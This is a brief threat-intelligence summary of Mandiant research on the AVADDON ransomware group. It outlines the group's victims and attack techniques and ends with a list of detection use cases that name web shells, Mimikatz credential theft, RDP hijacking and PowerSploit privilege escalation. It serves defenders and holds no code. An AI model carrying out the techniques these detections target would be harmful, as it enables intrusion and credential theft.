January 25, 2022

Mandiant – AVADDON Ransomware

Industry: N/A | Level: Operational  | Source: Mandiant

Mandiant has provided research on AVADDON ransomware operating between June 2020 and June 2021, when the group shut down since private encryption keys were released. The ransomware was advertised initially on Russian-speaking forums and targeted a variety of industry verticals. Nearly all sectors were impacted however, the highest based on victim count was in education, finance, government, healthcare, and technology. Based on the RaaS TTPs, Mandiant has speculated a potential link between AVADDON, BLACKMATTER and SABBATH. TTP observations included utilizing initial access brokers for compromised credentials, BLACKCROW and DARKRAVEN for custom web shells, RDP for lateral movement, EMPIRE and POWERSPLOIT for post-exploitation, scheduled tasks for persistence, 7zip for data archival, and MEGAsync for data staging and exfiltration.

  • Anvilogic Scenario: Avaddon Ransomware – Behaviors
  • Anvilogic Use Cases:
    • Potential Web Shell
    • Mimikatz
    • RDP Hijacking
    • Create/Modify Schtasks
    • PowerSploit Get-system.ps1